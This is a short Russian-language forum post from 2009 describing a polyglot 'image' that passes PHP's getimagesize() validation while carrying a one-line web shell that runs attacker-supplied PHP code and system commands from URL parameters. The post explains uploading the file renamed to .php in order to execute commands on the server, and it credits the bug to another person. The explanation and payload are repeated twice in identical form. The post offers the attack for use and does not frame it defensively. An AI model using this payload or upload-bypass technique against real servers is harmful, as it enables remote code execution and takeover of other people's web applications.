-Hormold-
25.03.2009, 14:31
Сделал интересную "картинку", обходящую функцию getimagesize().
В чём идея?
В том, что этой ф-ции чихать на расширение файла - она проверяет только тип и размер картинки, следовательно, можно загрузить картинку переименованную в php и функция не выругается. При том, что "картинка" выглядит очень похоже на нормальную картинку - это не мешает ей содержать
<? eval(stripslashes($_GET['c'])); system($_GET['s']); ?>
Загружаем переименованную в php эту картинку и выполняем свой код и команды на сервере. Если не открыть картинку блокнотом - выглядит очень правдоподобно.
Баг найден Eugen'ом с tem.dp.ua
В чём идея?
В том, что этой ф-ции чихать на расширение файла - она проверяет только тип и размер картинки, следовательно, можно загрузить картинку переименованную в php и функция не выругается. При том, что "картинка" выглядит очень похоже на нормальную картинку - это не мешает ей содержать
<? eval(stripslashes($_GET['c'])); system($_GET['s']); ?>
Загружаем переименованную в php эту картинку и выполняем свой код и команды на сервере. Если не открыть картинку блокнотом - выглядит очень правдоподобно.
Баг найден Eugen'ом с tem.dp.ua